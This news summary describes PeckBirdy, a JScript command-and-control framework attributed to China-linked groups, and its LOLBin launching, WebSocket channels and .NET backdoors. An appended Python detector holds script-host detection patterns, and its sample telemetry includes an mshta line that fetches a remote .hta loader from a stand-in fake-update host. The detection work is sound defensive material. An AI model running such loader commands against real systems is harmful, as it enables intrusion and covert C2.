Cybersecurity Pulse
China-Linked Hackers Have Used the PeckBirdy JavaScript C2 Framework Since 2023

Cybersecurity • January 27, 2026
Source: The Hacker News

Companies Mentioned

  • Trend Micro (4704)
  • Google (GOOG)
  • Adobe (ADBE)

Why It Matters

PeckBirdy shows how a script-based C2 framework that runs inside legitimate Windows script hosts and browsers can slip past endpoint defenses built around file signatures, raising the threat level for enterprises and government agencies in Asia and beyond.

Key Takeaways

  • PeckBirdy is written in JScript and launched through LOLBins such as MSHTA and WScript, so it runs on Windows script hosts, browsers, Node.js and .NET without a dropped executable
  • Communicates over WebSocket, falling back to Adobe Flash ActiveX or Comet when WebSocket is unavailable
  • Serves the modular .NET backdoors HOLODONUT and MKDOOR
  • Tracked as the clusters SHADOW-VOID-044 and SHADOW-EARTH-045, both linked to China-aligned groups
  • Observed on gambling sites and government portals, with fake Chrome update pages used as lures

Pulse Analysis

The emergence of script-based command-and-control frameworks marks a shift in how nation-state actors evade traditional defenses. PeckBirdy, discovered by Trend Micro, is built on JScript, a legacy Microsoft dialect of JavaScript that can be executed through a wide range of living-off-the-land binaries such as MSHTA, WScript and classic ASP. By abusing these LOLBins, the attackers can launch the framework on Windows script hosts, in browsers, under Node.js or inside .NET environments without ever dropping a standalone executable. That cross-platform reach reduces the need for custom implants and blunts endpoint tools that rely on file-based signatures, because the only file on disk, if any, is a script executed by a signed Microsoft binary.

Technically, PeckBirdy operates through a configurable API that returns a unique 32-character ATTACK ID, which lets the server deliver payloads tailored to the victim and its execution context. After the initial script determines which host it is running in, it establishes a communication channel, preferring WebSocket and falling back to Adobe Flash ActiveX or Comet (long-polling HTTP). The second-stage scripts can harvest cookies, exploit the V8 engine vulnerability CVE-2020-16040, display social-engineering pop-ups, or spawn reverse shells over TCP. Notably, the framework also serves modular .NET backdoors named HOLODONUT and MKDOOR, which can load, execute or uninstall additional plugins on demand.

The attribution trail ties SHADOW-VOID-044 and SHADOW-EARTH-045 to multiple China-aligned groups, including UNC3569, APT41 and the Earth Lusca family, pointing to a collaborative ecosystem that reuses code and infrastructure. For defenders, the key challenge is the scarcity of persistent file artifacts: PeckBirdy runs in memory inside a legitimate host process and injects follow-on code at runtime. Effective mitigation therefore requires behavioral analytics on process activity, inspection of network traffic for anomalous WebSocket or Comet patterns originating from script hosts, and strict control over which LOLBins may execute and what they may reach on the network. As script-centric C2 becomes more prevalent, organizations must broaden their detection playbooks beyond binary-focused tooling.
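As a worked example of the defensive direction described here, and of the mechanics in the two preceding paragraphs (a JScript payload launched through MSHTA or WScript, followed by an outbound WebSocket channel), the following Python sketch applies LOLBin control and script-host traffic inspection to constructed endpoint telemetry. It is added here as an illustration and is not code from Trend Micro's report or The Hacker News's article. Field names imitate Sysmon process-creation and network-connection records; the `upgrade` field is an assumption standing in for what a proxy or EDR agent with HTTP visibility would supply, and the script-host, suspicious-parent and allow-list sets are placeholders to tune per environment.

```python
"""Detect LOLBin-hosted script C2 in constructed endpoint telemetry.

Added example for illustration; not Trend Micro's or The Hacker News's code.
Event shape loosely follows Sysmon Event ID 1 (process create) and Event ID 3
(network connect). The 'upgrade' field is an assumed enrichment carrying the
HTTP Upgrade header, which plain Sysmon does not provide.
"""
import re
from collections import defaultdict

# Windows script hosts able to run JScript without a dropped PE (assumption:
# extend with cscript/wscript clones or other hosts used in your estate).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Parents from which a script host is rarely legitimate (assumption).
SUSPICIOUS_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe",
                      "winword.exe", "excel.exe", "outlook.exe", "w3wp.exe"}

# Destinations a script host may legitimately talk to (assumption).
WS_ALLOWLIST = {"intranet.example.local"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Inline-script prefixes used with mshta/wscript, or the //E:JScript engine switch.
INLINE_JS_RE = re.compile(r"javascript:|vbscript:|about:|/e:jscript", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path ('' stays '')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def process_findings(ev):
    """Reasons a process-creation event looks like LOLBin-hosted script execution."""
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return []
    reasons = []
    cmd = ev.get("command_line", "")
    if URL_RE.search(cmd):
        reasons.append("script host given a remote URL to execute")
    if INLINE_JS_RE.search(cmd):
        reasons.append("inline script passed on the command line")
    parent = basename(ev.get("parent_image", ""))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"script host spawned by {parent}")
    return reasons


def network_findings(ev):
    """Reasons a network event from a script host looks like a C2 channel."""
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return []
    reasons = []
    host = ev.get("dest_host", "").lower()
    if host and host not in WS_ALLOWLIST:
        reasons.append(f"script host connected to non-allowlisted {host}:{ev.get('dest_port')}")
    if ev.get("upgrade", "").lower() == "websocket":
        reasons.append("HTTP Upgrade to WebSocket from a script host")
    return reasons


def detect(events):
    """Correlate findings per PID: execution plus network on the same PID is
    rated 'high'; either kind alone is 'medium'."""
    by_pid = defaultdict(lambda: {"process": [], "network": []})
    for ev in events:
        if ev["type"] == "process":
            by_pid[ev["pid"]]["process"] += process_findings(ev)
        elif ev["type"] == "network":
            by_pid[ev["pid"]]["network"] += network_findings(ev)
    alerts = []
    for pid, f in sorted(by_pid.items()):
        if not (f["process"] or f["network"]):
            continue
        severity = "high" if f["process"] and f["network"] else "medium"
        alerts.append({"pid": pid, "severity": severity,
                       "reasons": f["process"] + f["network"]})
    return alerts


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # A browser-spawned mshta pulling an .hta from a fake-update domain, then
    # upgrading to WebSocket: the pattern described in the article.
    {"type": "process", "pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r"mshta.exe https://update-chrome.example.net/loader.hta"},
    {"type": "network", "pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "dest_host": "update-chrome.example.net", "dest_port": 443, "upgrade": "websocket"},
    # Benign logon script run by its usual parent against an allow-listed host.
    {"type": "process", "pid": 5300, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "command_line": r"wscript.exe \\fileserver\netlogon\map_drives.js"},
    {"type": "network", "pid": 5300, "image": r"C:\Windows\System32\wscript.exe",
     "dest_host": "intranet.example.local", "dest_port": 443, "upgrade": ""},
    # Not a script host: a browser's WebSocket is out of scope for this rule.
    {"type": "network", "pid": 880, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "news.example.com", "dest_port": 443, "upgrade": "websocket"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["pid"], "; ".join(alert["reasons"]))
```

The per-PID correlation is the point: a script host with a URL on its command line is noisy on its own in many estates, and a script host opening a WebSocket is noisy in others, but the two together on one process is close to the behavior the article describes. Tightening the allow-list (or blocking script-host egress outright at the proxy) turns the second check into a preventive control rather than a detection.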
